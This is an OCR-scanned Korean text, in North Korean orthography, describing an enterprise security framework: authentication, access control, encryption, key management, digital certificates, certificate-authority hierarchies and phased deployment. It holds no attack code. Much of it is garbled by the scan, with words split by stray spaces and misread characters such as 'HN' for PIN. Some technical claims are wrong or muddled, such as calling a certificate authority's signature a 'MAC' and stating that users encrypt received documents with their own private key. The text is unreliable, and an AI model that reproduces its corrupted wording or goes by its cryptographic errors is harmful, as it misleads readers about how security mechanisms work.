정확한 보안틀거 리를 위한 다섯가지 기초기능들은 다음과 같다. 

1. 인증 사용자들의 신원을 믿음직하게 밝혀 보증하는것 

2. 접근조종 합법적 인 사용자들만 해 당자원에 접근할수 있게 하는것 

3. 사적비밀보장 합법적인 대상들사이의 통신과 체계내의 자료에 대한 비밀성을 담 
보 하는것 

4. 자료의 무결성보장 통신내용，파일，프로그람을 제멋대로 수정조작하지 않도록 하 
는것 

5. 부인방지기능 해당 사용자가 해당 통보문을 보냈다는 부인할수 없는 증거를 제 
공하며 수신자가 다른 통보문을 받았다는것 을 방지하는것 

비루스방지와 갈은 기능들은 따로 제기할 기능은 못되는것으로 본다. 그것은 이 기 
능이 무결성，접 근조종，인증기 능들과 대체 로 결부되 는것 이기때 문이 다. 

인증 

전자통신을 하는 하나의 대방이나 여러 대방들의 신원을 확인하는 과정인 인증은 대 
방으로 하여 금 신원에 대 한 증거 를 제 시하게 한다. 즉 그들의 머 리속에 있는것，몸에 지 
니 고 있는것 혹은 그들의 신체 적특성 들시 그 증거 로 된다. 개 인들이 육체 적 으로 현지 에 
있어 신원을 제시할수 있는 경우에는 이 특성들은 사람의 육체적특징들인 생체계측지표 
의 형태로 제시될수 있다. 실례로 지문，음성기록이나 망막스캔을 들수 있다. 여기서 처 
음의 두가지가 가장 많이 쓰이고 있는데 그것은 상대적으로 실행하기가 쉽기때문이다. 

그 어떤 생 체계측형 태의 신원자료를 처 리할수 없는 통신환경에서 는 가장 쉬 운 방법 
이 간단한 통과암호를 쓰는것 이 다. 인증을 위하여 여 기서 는 사용자에 게 알려 진 통과암 
호를 제 시할것을 요구한다. 통과암호에 대 한 인증이 잘 되 려면 안전한 통로를 리용하여 
망으로 암호화된 통과암호를 전송하여 야 하며 그렇 지 않으면 전자도청 수단에 의해 통과 
암호가 롱락당할수도 있다. 

통과암호자체는 그리 안전하지 못하다. 대체 로 짧고 기 억하거 나 옆에서 보기 쉽다. 
일정한 형 태의 수자식상업형 태 에서는 지 금까지 가장 약한 고리 가 바로 통과암호였다. 또 
한 각이한 체계 에 수많은 통과암호를 쓸것을 요구하므로 사용자들이 모든 접근요구사항 
에 하나의 통과암호를 쓰는 경향이 지배적이였다. 사용자들은 거의 모두 자기의 통과암 
호를 써 놓은 목록에서 하나를 선택하여 쓰든가 아니 면 모든 통과암호를 다 종이 쪽지 에 
씨서 콤퓨터옆에 놓고 쓰기 가 일쑤이 다. 이 두 경우가 매우 위험한 경우로서 다른 사람 
이 모든 체계들을 단번에 다 녹여 낼수 있는 가능성이 매우 높다. 

효률성이 높은 인증방식은 통과암호(본인이 알고 있는것)와 눅은 스마트카드식통표 
(본인이 지 참하고 있는것)를 결 합시키 는것 이 다. 그 대 표적실례 가 바로 ATM (자동현금출납 
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기)카드이다. ATM 카드는 본인이 직접 가지고 다니는것이며 PIN (개인식별번호)은 본인이 
머리속에 가지고 있는것이다. 결합을 잘하면 하나 쓰는것보다 보호가 더 잘 될수 있게 
된다(두 요소인증). 

인증의 중요한 측면의 하나는 인증이 단일방향적인것 (보내 는 사람이 봉사기 에 인증 
을 하는것)인가 아니면 쌍방향적인것(사용자와 봉사기가 서로 인증하는것)인가 하는 문제 
이다. 실례로 한 은행지점에 있는 ATM 을 사용할 때 그것이 합법적인 ATM 이라고 가정 
한다. 그러나 주차장에 홀로 서 있는 ATM 을 사용할 때 그것에 대해서도 곡같은 믿음이 
가겠는가가 문제 이다. 도적들이 극히 신뢰성 이 가게 만든 가짜 ATM 을 주차장들에 건설 
하였다는 문건화된 사건기록도 있다. 현금은 물론이고 ATM 카드와 HN 을 순진한 사용자 
들에게서 수십개나 가로채간것이다. 이러한 사기행위들이 믿건대 드물다고는 하지만 이 
것을 보면 쌍방향적 인 인증의 필요성을 절감하게 된다. 

전자적 인 환경 에서 공개열쇠암호화체 계 (흔히 공개열쇠 기반 즉 PKI 라고 함)에 수자식 
인증서 들을 결 합하면 호상인증을 위한 명 백 하고도 안전한 방도를 가질 수 있 다. 

공개열쇠와 비밀열쇠체계들과 수자식인증서의 효력은 비밀열쇠를 어떻게 비밀에 붙 
이 는가 하는데 있 다. 

만일 어떤 사람의 비밀열쇠가 도난 당하든가 비법적인자가 접근했든가 하면 그 사람 
으로부터 오는 통신과 그 사람에게 가는 통신은 다 손상된것으로 간주하여 야 한다. 기관 
들에 서 비 밀 열쇠 를 개 인용콤퓨터 에 기 억 시켜 두는것 은 하나의 심 각한 보안위 험 으로 된다. 
비 밀 열쇠 가 개 별적사람의 콤퓨터 에 있으므로 사용자는 그 콤퓨터 상에서 인증을 받아 보 
안을 담보해 야 하는것 이 다. 가장 강력한 보안체 계에서 는 이 정 보를 스마트카드에 보관하 
고 HN 을 써 야만 접 근권을 허 용 할것 이 다. 

접근조종 

접근조종(즉 허 가 혹은 인가)은 단어그대 로 사용자가 보안방책관리 자의 결심 에 따르 
는 해당자원(체계，목록，자료기지，지어 기록부들)에 대한 접근권을 가지게 하는것을 말 
한다. 접근조종에 널리 쓰인 기술에는 접근조종목록 ( ACL )， 단일계약제품방화벽을 리용한 
믿 음직한 운영 체 계 들도 있 다. 단일 개 시신호제 품들은 사용자로 하여 금 해 당 환경 에 대 한 
인증을 대 화당 꼭 한번만 받게 한다. 그리하여 사용자는 그 대 화기 간 보충적 인 인증을 
받을 필요없이 해당 자원중에서 어느것이나 접근할수 있는 권한이 부여 받는다. 

사적비밀 

사적비밀은 어느 보안환경에서나 초석이다. 사적비밀에 대한 정의가 사용자와 소유 
자간에 상당한 차이를 보여 주기도 하지만 사적비밀문제는 자료가 금융적，연구적가치나 
인사문제와 관련한것일 때에는 더욱 중요하다. 회사의 내부망에서도 사적비밀문제가 중 
요하다. 그러 나 개 인 및 회 사자료에 대 한 일정한 접 근권을 주면서 도 동시 에 개 인들과 회 
사의 리익이 보호되여야 하므로 엑스트라네트에서는 자료취급과 관련하여 가장 큰 애로 
를 느낀다. 
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디스크에 보관하였건 망에서 교환되건 관계 없이 정보는 그 비밀성 에 따라 불법사용 
자들이 해독하지 못하도록 암호화되여야 한다. 물리적으로 고립시키는 방법으로 사적비 
밀성을 보장할수는 있다. 그러나 오늘의 콤퓨터사용환경에서 이것은 누구에게나 다 비효 
률적 인것 이 다. 리상적 인 해결책은 중앙집권화가 아닌 분권적 인 암호학적환경 을 시 행하여 
매 사용자에 암호화된 정보들을 가지고 교환할수 있게 해 야 한다. 

전자적인 자료에 대한 신뢰사항은 전체적으로 암호화하는 토대에 의거한다. 대칭적 
및 비대칭적암호화 등 많은 암호화체계들이 있다. 그러나 비대칭적암호과정은 대개 심각 
한 약점을 하나 가지고 있다. 즉 그것은 대칭적공정에 비하여 계산학적으로 매우 비용이 
많이 든다는것이다. 

이 문제를 최소화하기 위해 빠른 대칭적코드화체계가 속도가 느린 비대칭적체계와 
결합되고 있으며 공개열쇠와 비밀열쇠를 결합적으로 사용하여 통신자료를 해신하고 복호 
화하게 된다. 안전한 환경에서 매 사용자는 공개열쇠와 비밀열쇠와 함께 사용자이름을 
할당받게 된다. 공개열쇠는 사용자이름과 함께 리해관계를 가지는 모든 대상들에 공개되 
게 되지만 비밀열쇠는 그 소유자만 알고 있다. 

정보의 무결성을 보호하는 다른 절차에서는 수자식서명을 생성하고 확인하고 비대칭 
코드화와 검사합알고리듬과 결합하여 이 모든것들을 효률적 으로 쉽게 실행 하게 된다. 

그러면 해당 대상은 자료요소들에 수자식서명을 결합하는 방법으로 열쇠소유자를 
인증하게 된다. 그러나 이렇게 되면 그 대상이 그 열쇠에 대응된다는것만 확인하게 된 
다. 이름으로 그 대상을 인증하려면 그 이름과 공개열쇠가 서로 일치한다는것을 담보 
할수 있는 방도가 있어야 한다. 이 문제를 개인증명서와 비교할수 있다. 즉 대상과 증 
명서사진사이의 일치만 보고 그 대상의 이름이 증명서에 있는 이름과 같다고 단정할수 
없는것과 갈다. 

증명서에서와 같은 원리로부터 출발하여 전자형식의 증명서를 생각해 볼수 있다. 서 
로 대응되는《신분증》은《공개열쇠 + 이름짝》을 보증하는 증명서라고 할수 있다. 또 
한 이름과 열쇠의 한조를 안전한 통로로 대방들에게 보내고 쓰기방지로 보존할수도 있다. 
가입자나 구독자가 얼마 안되는 경우에는 모든 통신대방의 이름과 공개열쇠를 전자문서 
관리 체 계 에 표로 보관할수 있 다. 《 중간다리》공격 을 피 하기 위 해서 는 이 름과 공개 열쇠 
가 실지 한사람의것이라는것을 담보하는것이 필요하다. 실지 이것은 이름과 열쇠쌍이 반 
드시 안전한 통로로 분배되고 체계에 쓰기방지되여 보관되여야 한다는것을의미힌다. 

자료의 무결성 

무결성은 자료가 헝클어 지거나 파괴되거나 비법적으로 변경되지 않게 보호하는것을 
말한다. 또한 설정값들도 변경되거나 조작되지 말아야 하며 각종 봉사들, 응용프로그람블, 
망들의 완전무결성도 보호되여야 한다. 정보의 무결성을 보존하는것은 사활적인 문제이 
다. 정보가 두 대방사이에 교환될 때 그 대방블令 이 정보가 조작되지 않은것이라는 실 
례를 필요로 한다. 검사합정보와 개념상으로 류사하게 모든 암호화체계들은 무결성담보 
를 위한 효과적인 방도를 제시해 준다. 
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부인 방지 

이 요구사항은 법적론리로서의 중요성을 떤다. 내적 으로나 외적 으로나 점점 더 많은 
기업들이 전자적운영으로 넘어 가고 있음으로 하여 전자업무거래에서 송신자에 대한 일 
정한 형태의 법적증거와 송신이 끝났을 때 받은 수신문에 대한 법적증거를 가지고 있게 
하는것이 필요하다. 이 요구사항은 신원확인과 접근조종이라는 항목과 꼭같이 필요한 항 
목이다. 

정보기술요구사항 


보안의 기초구조가 잘되자면 우에서 이야기한 기능들이 발현되여 야 하는 동시에 다 
음과 갈은 요구사항들도 만족시켜 야 한다. 

• 기업전반에 걸쳐 변화되는 보안강화요구사항들 

• 정보기술기반시설에 이미 구축된 보안갑문과 방화벽과 같은 점보안제품들과의 
결합 

• 모든 정보기술부서들에 있는 이질적인 가동환경，응용프로그람，망，망설비와 도 
구들 

• 사용자와 체계관리 자들의 리용성과 능력 에 대 한 요구사항들 

• 부서 간，지역간 및 기업간 거래 

• 사용자의 사용상편리의 요구사항들 

• 정보기술기관들의 통제하에서의 신축성 있고 효과성 있는 시행 

• 기업전반에 걸치는 단계별시행과 배치 

최상의 보안은 사용자집단에 투명하다. 그 어떤 유명한 고위인사가 공개방문할 때 
실제로 보이는 보안요원들은 그 사람을 호위하기 위하여 배치된 전체 보안무력의 극히 
작은 인원에 지나지 않는다. 정보보안역시 사용자전체에게 보이지 말아야 하며 거의 모 
든 보안틀거 리가 막뒤에 숨겨 져 있어 야 한다. 

정 보기 술부서 들에서 흔히 볼수 있는 공개 적 인 체 계 의 환경 에 서 의 투명 성 이 문제 거 리 
로 될수 있다. 여러 판매업체들에서 기술을 받아 리용하면 최고급의 기술을 선택할수도 
있고 경쟁력도 조장시키므로 좋은 대안으로 될수 있다. 그러나 중요한것은 여러 업체들 
에서 구입한 기술형태들의 공개된 표준에 기초하여 서로 흠이 없이 미끈하게 융합되여 야 
하며 그렇지 않으면 일체화의 노력 으로 하여 우점을 다 놓칠수도 있다. 

종국적으로 현 정보기술기관들은《문제점들을 소유》하고 있는 셈 이 다. 방화벽 이 나 
스마트카드 같은 개별적인 보안《점》제품들을 수많이 살것이 아니라 종합적인 보안기본 
구조를 실행하는것이 더 좋다고 볼수 있다. 보안기본구조를 이루는 구성요소들은 표준프 
로그람작성 대 면부를 리 용하여 잘 설계 하여 구성 요소들호상간 그리 고 구성 요소들과 현존 
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정보기술응용기지와 름이 없이 잘 호상운용되도록 하여야 한다. 제품들은 여러 업체에서 
구입할수는 있으나 전반기업의 요구조건들에 부합되는 기본구조에 다 맞아야 한다. 

오늘의 전자적인 경제에서 각 기관들은 다른 기관들과 투명하게 서로 통신해야 한다. 
이것이 바로 인터네트와 상업적인 폭발력을 가지는 기본요인이다. 세계의 망구성환경은 
내부망과 외부망에 긴밀하게 련결되여 있는바 그중에는 인터네트와 호상련결되여 있는것 
들이 많다. 이로부터 기관들이 호상 망통신을 할수 있는 능력도 높아 진다. 이 모든 망환 
경에서 바로 자료의 안전이 유지되여야 하는것이다. 

다음의 구성요소들이 통합되여 하나의 종합적인 보안체계의 핵심적구조를 이루며 이 
것들이 바로 비법접근과 도용으로부터 기업집단의 자료들을 보호하게 되여 있다. 

보안의 열쇠인 암호화 


암호화란 평문으로 된 자료나 문건을 송신자와 소여접수자에게만 알려 진 비밀코드 
를 리용하여 암호문으로 전환하는 과정을 말한다. 복호화란 그 반대의 과정으로서 암호 
문을 평문으로 수복하는 과정 이다. 문서 암호화에 쓰이는 수법들은 수없이 많다. 이것들을 
크게 묶어 보면 대칭암호화수법과 비대칭암호화수법으로 갈라 볼수 있다. 

자료암호화표준 ( DES ) 과 같은 대 칭적열쇠구조에서는 송신자와 수신자사이 에 공유된 
하나의 열쇠 를 사용한다. 이 열쇠 를 평문에 적 용하면 암호문이 나오고 암호문에 적 용하 
면 평문을 만들수 있 다. 대 칭열쇠방식 에서 도 송신자와 수신자가 반드시 곡같은 열쇠 를 
가져 야 한다. 대 칭열쇠는 작용은 잘하지 만 서 로 암호화된 정 보를 교환하려는 사람들의 
수가 많아 지는 조건에서는 공유규약의 규모설정이 잘되지 않는다. 

비대칭열쇠구조에서는 공개열쇠와 비밀열쇠 한쌍을 쓰는데 암호화와 복호화에 각각 
다른 열쇠 를 쓴다. 공개열쇠암호화기 술의 우점 은 그 사용자만이 자기비 밀 열쇠 를 쓸수 있 
으며 사용자가 공개열쇠 를 다른 사람에 게 준다는것 이 다. 다른 사람들이 사용자와 통신할 
때에 문건을 암호화하려면 공개열쇠를 써야 하며 사용자는 자기의 비밀열쇠로 문건을 암 
호화한다. 

공개열쇠 와 비 밀 열쇠사이 에 는 반비 례적 인 수학적관계 가 있어 공개열쇠 로 암호화한 
통신문은 비밀열쇠를 가진 사용자만이 복호화하게 되여 있다. 또한 비밀열쇠를 가진 사 
용자가 통신문을 암호화한다면 다른 사람들은 그가 보낸 공개열쇠 를 가지 고 있어 야 그것 
을 복호화할수 있게 되여 있다. 이 특성이 있음으로 하여 열쇠를 사용하자면 문건에 수 
자식《서명》을 하게 되는것이다. 

필수사항인 강력한 암호화 

오늘 광범위하게 사용되는 하나의 보안기술(아마 그래서 실제상의 표준이 되였을수 
도 있는)은 RSA 이라는 강력한 공개/비밀열쇠쌍에 전자증명서를 덧붙인 기술이다. 여기서 
강력한 암호화라고 할 때 정 보가 가치 를 가지 는 기 간이내 에 마스기 거 의 불가능한 암호 
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화기술의 사용을 말한다. 

강력한 암호화와 약한 암호화를 가르게 된것은 미국정부가 통신문암호화기술의 수출 
제한조치를 취한데 대해 론쟁이 벌어 진 때부터 시작되였다. 

인터네트상에서 전송되는 평문의 전자우편내용과 기타 문서들은 경험이 보여 주는바 
와 같이 해커들이 다 엿보게 된다. 암호화가 대안이라면 어째서 해커가 남의 열쇠를 추 
측하여 그 사람의 암호문을 복호할수 없는가. 대부분의 경우에는 시간문제이외에 다른 
아무것도 아니다. 

해커들이 쓰는 하나의 방법은 평문과 그에 대응되는 암호문표본을 하나 가지고 본문 
암호화에 쓰인 열쇠를 재건하기 위해 강제적방법으로 임의의 비트렬을 반복적으로 시도 
해 보는것이다. 그렇기때문에 해커에게 필요한것은 고속를퓨터나 함께 일할수 있는 콤퓨 
터들의 망，평문과 그에 대응되는 암호문이다. 이 강제식공격에 대처하기 위해 암호화열 
쇠들은《강해》야 하는것이다. 

암호체계의 강도평가 

강한 암호화씨 나리 오에서는 해커의 전략이 고성 능를퓨터 자원들을 리 용하여 암호화열 
쇠를 해독하려 하는것으로 본다. 이 해킹공정에 대한 대응책은 해커가 열쇠를 해독하려 
면 시 간이 너 무 오래 걸릴만큼 충분히 큰 열쇠 를 만드는것 이 다. 콤퓨터 속도가 18개 월만 
에 약 2배로 장성한다는것을 여기서 류의할 필요가 있다. 열쇠의 크기가 너무 커서 해커 
가 지금에도 미래에도 해독해 내지 못해야 한다. 또한 열쇠를 자주 바물 필요도 없지 않 
는가. 

열쇠는 얼마나 커 야 하는가. 강력한 암호화는 강제식공격 을 저지시 킬만큼 충분히 큰 
열쇠규모에 기 초한 암호화를 의 미한다. 따라서 해커 들이 강력한 수많은 를퓨터 들을 리 용 
한다 해도 유효시간내에 그 열쇠를 마슬수 없어야 한다. 즉 수년동안에도 복원해 내지 
못해 야 한다. 열쇠 의 크기 가 56 bit 나 이 보다 작으면 약하다. 128 bit 이 상의 열쇠규격 은 매 
우 강한것으로 평가된다. 잘 몰라도 오늘의 자료보호에 리용된 열쇠는 최소 75 bit 길이여 
야 한다고 생각하면 틀림이 없다. 계산능력 이 급속히 발전한다고 볼 때 앞으로 20년동안 
정보를 잘 보호하려면 새로 설치하는 체계들에 쓸 열쇠의 길이는 적어도 90 bit 쯤 길어야 
한다. 


열쇠관리 

열쇠를 안전하게 관리하는것은 극히 중요하며 보안산업에는 이 문제를 해결하는 제 
품들이 수없이 많다. 

해 커 들의 대 부분의 공격 은 열 쇠 자체 에 대 한 관리 를 알아 내 기 위한 시 도들인 데 그것 
은 강제식공격 을 해도 128이상의 bit 수를 가진 열쇠를 마스는데는 오랜 시 간이 걸 리기때 
문이 다. 

사용자가 고려해 야 할 여 러 가지 열 쇠 관리 사항들이 있 다. 
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• 사용자는 자기 열쇠들을 매우 안전하고 효률적으로 만들거나 구입하여야 한다. 

• 사용자는 자기의 열쇠들을 남들에게 분배해 야 한다. 

• 타방의 신원에 대한 신뢰를 가지고 타인의 열쇠를 구입해야 한다. 

안전한 열쇠관리가 없으면 해커가 열쇠를 마음대로 처리할수 있으며 열쇠사용자로 
가장하여 나설수도 있다. 사용자의 공개열쇠의 확실성에 대한 믿음을 주기 위하여 공개 
및 비밀열쇠쌍과 함께 수자식 인증서 라고 하는 형 태의 《증명》도 리용한다. 

열쇠와 수자식인증서 

수자식인증서들은 보안기본구조에서 안전한 구성요소로 되여야 한다. 즉 인증서위조 
가 불가능해야 하며 불안전한 방법으로 구입하지도 말아야 한다. 또 합법적인 인증서를 
비법적인 목적에 사용하지도 말아야 한다. 안전한 기반은 인증서들을 보호하는데 필요하 
며 인증서들은 또 그것대로 공개열쇠의 확실성을 증명해 준다. 

인증서기반의 중요한 기능들중의 하나는 인증서를 취소하는것 이 다. 누구의 공개열쇠 
가 도난 혹은 분실되면 그 사람은 자기와 통신하는 사람들에게 알려 주어야 한다. 그들 
은 그 사람을 위한 그 공개열쇠를 더는 쓰지 말아야 하며 또 효력을 잃은 그 열쇠를 가 
진 사람에게서 오는 수자식서명을 한 문건도 접수하지 말아야 한다. 이것은 어떤 사람이 
신용카드를 분실하든가 혹은 어떤자가 이것을 도적질했을 때와 비슷하다. 

열쇠가 만들어 지면 열쇠에는 기한만기날자가 주어 진다. 열쇠란 일정한 시간이 오 
면 수명이 끝나든가 해야지 그렇지 않으면 마모로 하여 신뢰성이 떨어 질수도 있다. 그 
런데 여기서 기한만기날자는 해당 환경에서 실시하는 보안방책의 한 부분으로 되므로 심 
중하게 설정해야 한다. 다른 사용자들에게도 그 만기날자를 알려 주어야 하므로 열쇠들 
의 기한만기날자를 너무 자주 설정해 놓으면 증명서 및 열쇠관리기반에 부하를 많이 줄 
수 있게 된다. 

수자식서명과 확인 

암호화하는것이 통신의 사적비밀보장을 위한것이라면 인증은 어떤것인가 즉 문건을 
받아 보는 접수자는 그 문건송신자가 진짜 송신자가 맞는가를 어떻게 확인하는가 또 반 
대의 경우는? 쌍방을 인증하자면 수자식서명과 확인절차를 결합하여야 한다. 

서 로 믿는 사이 인 계3자에게서 받은 수자식 인증서 는 개 인의 공개열쇠의 신빙성을 보 
증한다. 이 3자를 인증국 (Certificate Authority 즉 CA ) 이라고 한다. 이 기관은 비전자적인 
세계에서 공증소가 하는 일과 비슷한 방식으로 운영된다. 인증서에는 그 개인에 대한 일 
련의 표준정 보가 들어 있게 되 며 그 사람의 공개열쇠 도 있 다. 인증국은 그 사람의 인증 
서 에 수자적방법 으로《서명》을 하여 그의 수자식신원과 함께 그가 가지 고 있는 공개열 
쇠의 유효성도 보증한다. 

수자식서명은 전자상업거래대방들에게 법적의의를 가진 다. 서명자의 비밀열쇠를 리 
용하여 쌍방이 다 인정할수 있는 암호화된 서명을 하게 된다. 이 서명은 그 개 인의 신원 
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에 대한 증거로 된다. 즉 오직 비밀열쇠소유자만이 그 무엇을 암호화할수 있으며 그것은 
공개열쇠를 가져야만 복호화할수 있다. 

인증국이 수자식인증서에 서명해 주는 경우 이 기관에서는 자기의 비밀열쇠를 리용 
하여 수자식인증서에 보관된 정보 즉 사람의 이름，인증국이름，계렬번호 및 인증서유효 
기간과 같은 정보를 암호화한다. 이 정보를 통보문인증코드 ( MAC ) 라고 한다. 보내는 사람 
과 받는 사람이 다같이 그 인증서에 접근한다. 따라서 MAC 정보는 쌍방이 다 확인할수 
있 는것 이 다. 

서 명당사자인 인증국의 공개열쇠 만 가지 면 누구나 수자식 인증서 를 확인할수 있다. 
어 떤 암호문서 를 보낼 때 사람들은 신뢰 와 확인을 위하여 실제 적 인 문건교환과는 별도의 
단계로서 대방과 인증서를 교환한다. 

실례 로 제 인과 쌤 이라는 두 사람사이 에 사적 인 통보문이 교환되며 호상 확인과정 이 
있다고 보자. 제인이 암호화된 문서를 쌤에게 보내려면 먼저 쌤의 수자식인증서를 얻어 
야 하는데 그 인증서 에는 CA 가 서명한 쌤의 공개열쇠 가 들어 있다. 제 인은 역시 CA 의 
공개열쇠를 가지 고 CA 의 서명 을 확인한 다음에 야 자기 가 가지 게 되는 공개열쇠 가 정말 
쌤의것이라는 확신을 가지게 된다. 그것은 CA 의 비밀열쇠가 그 서명에 리용되였기때문 
이다. 쌤은 제인의 인증서를 밤으면 이와 류사한 공정을 재현한다. 물론 대부분의 이러한 
공정들은 프로그람적으로 조종되여 사용자가 거의 느끼지 못하며 현 기술수준에서는 그 
지 연속도가 거의 알리지 않는다. 

확인기반 

우에서 설명한 두 대 방사이 의 거 래 과정 은 공개열쇠 의 암호화와 확인공정 이 다. 이 것 
은 간단한 하나의 실례에 지나지 않는다. 그것은 갈은 기업내에서도 보안방책에 의하여 
부서 별로，지 역 별로 분리 시켜 인증서 를 관리 함으로써 세 밀화된 수준의 보안통제 와 책 임 
성문제를 다루어 나가기때문이다. 

이 문제에 대한 해결책은 전 세계적으로 오직 하나의 기본인증국이 모든 인증서를 
발급하게 하자는것이다. 이러한 운영모형을 오랜 기간 시도하였지만 회사들이 수천수만 
가지의 인증서에 저마끔 빨리 접근하려고 하기때문에 이 인증국에 병목현상이 생기게 
된 다. 보안기 초에 서 중요한 근본문제 의 하나는 자기 자체 의 자원을 자체 로 통제 하는 능 
력 이 다. 

인증서관리와 갈은 사활적인 책임을 3자에게 떠맡길수는 없는것이다. 그리하여 일부 
기 관들이 도입해 온 대 안이 바로 계 층성확인구조를 구축하는것 이 다. 기 관내 에 하나의 
《 고위인증국》을 정 하고 거 기서 아래수준의 사용자 혹은 부서 인증국 ( UCA ) 을 확인한다. 
고위인증국은 기관의 인증서취소명 단 ( CRL ) 을 만들어 보존하며 부득이한 경우를 제외하 
고는 매 일매 일의 인증서관리 사업 을 하지 않는다. 이 사업 은 사용자인증국이 한다. 기 관밖 
에서는 최고위급의 CA 가 임명되는데 이 《방책 인증》 ( PCA ) 은 모든 고위인증국들을 확인 
해 두고 기 관들사이 의 CRL 들을 관리하여 기 업호상간의 신뢰 를 담보해 준다. 마지 막으로 
세 계의 모든 PCA 들은 하나의 《 인터네 트 PCA 등록국》에 의해 확인되 여 확인의 인증기 반 
간의 신뢰를 담보한다. 
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기업보안기틀의 실현 


기업의 정보보안환경을 꾸리는것은 하나의 중요한 복잡한 과제로서 매 기업마다 달 
라 질수 있다. 이 환경조성사업은 단계별로 해야 하는데 첫단계에서는 보안규정과 그 기 
본구조의 설계를 해야 한다. 이 두가지는 구조를 잘 짜서 현재와 미래의 요구뿐아니라 
예산안작성의 요구도 고려하게 되여야 한다. 또한 고려해야 할것은 기업간요구사항들이 
다. 즉 전자적인 자료교환에 참여하는 판매업체들, 동업자들，고객들은 누구인가，어떤 순 
위권으로 이 교환을 하겠는가 하는 문제 이다. 

아래에서는 기업의 안전한 정보기술환경을 구축하는데서 나서는 과업들을 포괄적으 
로 보려고 한다. 

보안검사 

보안실행은 권위 있는 회사에 의한 보안검사로 시작되여야 한다. 검사의 역할은 다 
음과 갈다. 

• 현 정보기술환경을 기술한다. 

• 현재 있는 보안장치의 모든 측면 즉 물리적보안과 함께 쏘프트웨어 및 하드웨어 
적보안에 대한 모든 측면을 료해한다. 

• 발생하였거나 발생할수 있는 보안위반현상들에 대한 구체적이며 기밀적인 분석 
자료를 마련한다. 

• 다른 기관들과 비교할 때 부족되는 점들을 기본으로 현 보안체계 에 대 한 평 가를 
진행 한다. 

• 이전에 일어 난 사고들의 원인에 대한 객관적인 분석을 진행한다. 

• 보안하부구조의 개선안들을 권고한다. 

기업분석과 보안방책의 개발 

다음 단계는 검사결과에 기초하여 기업분석과 함께 심도 있는 보안분석을 해야 한 
다. 그 다음에야 보안방책이 기업의 실지 요구에 맞게 개발될수 있다. 보안구조는 이 방 
책 에 맞게 개 작될수 있을것 이 다. 이 과정은 다음과 갈은 다층적 인 공정을 포괄한다. 

1. 정보기술기관과 보안인원들사이의 조직적관계의 설정 : 다른 독립적인 보안기관이 
있는가，있다면 정보기술기관에서는 그 방책들이 어떻게 실시되는가，보안예산은 
어떤것이며 자원분배는 어떻게 하는가. 

2. 보안 및 정 보기 술분포모형 의 작성 : 본사가 방책 을 작성 하고 모든 싸이드들에 그 
시행을 요구하는가 아니면 원격싸이트들이 자기의 독자적인 정보기술환경에 대한 
권한과 책임을 지고 있는가. 
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3. 기 업준위의 보안목적에 대한 료해 : 보호해 야 할 기본자원들과 누구로부터 보호해 
야 하겠는가를 결정한다. 누가 이 자원들을 주로 사용하며 그것 으로 무엇을 하는 
가，어 떤 검 사체 계 가 있으며 물리 적고립 과 하드웨 어/ 쏘프트웨 어 에 대 한 요구사항 
들은 어떤것인가. 

4. 정보기술판매업체의 영업문제분석 : 여러 판매업체에 비해 하나의 판매업체를 대 
상하는 문제，각이한 판매 업체 에서 제품과 봉사를 구매하는 문제，숙련 및 지 원과 
관련한 경험 등 

5. 보안강화가 필요한 응용프로그람들，자료파일들，봉사기 및 의뢰기체계의 목록 
작성 

6. 현재，단기 및 장기 정 보기 술환경 에 대 한 계 획 작성 : 영 업 구성단위 들사이 에 오가 
는 자료흐름，가동환경，하드웨어，망의 위상구조，제3자의 전자적인 호상활동의 
요구조건들과 갈은 문제 의 해 결，공간계 획 과 물리 적보안 

7. 높은 수준의 보안구조제 기 : 회 사의 자료에 대 한 정의 및 접 근조종을 위 한 보안구 
조의 제기. 실례로 방화벽을 가진 접근조종봉사기，스마트카드와 단일한 인증，중 
앙집권적 인증과 같은 계층인증 등 

8. 높은 수준의 기 업보안방책작성 : 싸이 트보안인원，접 근조종，확인，기 타 기 업 자원 
과 보안기반의 호상작용 

9. 보안틀거 리 내 에 서 그리 고 틀거 리 와 응용프로그람들사이 에 존재 하는 기 본의 존관계 
들을 분석 하고 문건화한다. 

개발계획작성 

일단 높은 급의 보안방책과 틀거리가 구성되면 개발계획은 기초구조를 가지게 된다. 
다음 단계 에는 그 틀거 리구상을 여 러 가지 과제로 갈라 매 과제들의 규모나 비용을 고려 
하여 송달과 배 치시 간표를 짠다. 

계 획 작성단계 에 는 그 어 떤 이 렇 다할 유일 한 방도가 있는것 이 아니 다. 많은 그룹에서 
재 능과 자원을 동원하여 야 한다. 비 용위 주이 든 복잡성 위 주이든 실 행모형 으로 여 러 가지 
대 안들을 내 놓고 토의하여 선택하는 방법 도 있을수 있 다. 

계획책임자는 이 단계에서 선출해야 한다. 이 책임자는 정보기술개발계획에 대한 넓 
은 기 술적배 경 지 식 과 보안실 행공정들에 대 한 비 교적 깊은 지식 을 소유해 야 한다. 

실행모형설정 그 어 떤 실 행모형 의 선택 을 권고하기 가 힘 든것 은 정 보기 술기 관들에 서 
진행되는 여러가지 기타 사업들에 의존되는것이 너무나도 많기때문이다. 실례로 어느 기 
관이 하나의 중요한 쏘프트웨어계획을 시작하려 한다면 모든 체계들이 공개되여 보안관 
련부분프로그람들을 갱 신 하고 기 능향상시 키 는것 만큼 철 저 한 보안계 획 실 행 이 선 차적 인 문 
제 로 나설 것 이 다. 반대 로 자원 이 이 미 과잉할당되 였 다면 큰 보안관련 계 획 들은 얼 마 실 행 
하지 못할것 이 다. 

보안계 획 을 개 시 하기 위한 방도는 국부적 인 의 뢰기/봉사기 (군)준위 에 서 시 작하여 싸 
이 트전반의 배 치를 거 처 기 업전반애까지 단계 별로 전진하는것 이 다. 매 단계 에서 문제 점 
해결은 서로 류사한 방법으로 될수 있다. 실례로 기본인증 및 접근조종체계를 구현하여 
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개별적장치들과 망주변에 대한 기초적인 보안을 보장하는 방법으로 시작되는것이 가장 
좋을것 이 다. 

다음 단계는 망준위에서 중앙집권적봉사를 하는 높은 급의 인증과 접근조종과 함께 
사적 비밀과 무결성 을 보장하는 암호화환경 을 구축하는것 이 다. 마지 막으로 망울타리 와 망 
내부에서 접근조종，강한 암호화체계，확인체계，통표관리，부인방지 등을 원만히 구현한 
정말 강한 보안을 실현하는것이다. 

현존체계도 설계형성을 시작하는것이 좋은 설계실천이다. 그 리유는 : 

• 이 체계가 오늘까지의 기억체계로 바뀌여 지는 기간 수많은 조직구조적인 변화 
를 거쳐 왔기때문이다. 

• 이 체계가 대체로 기업에서 핵심이기때문이다. 

• 이 응용체계들을 개조하는데는 부담이 상당히 많이 들기때문에 그 체계를 보안 
으로《둘러싸》는것 이 더 좋은 전략으로 생각되기때문이 다. 

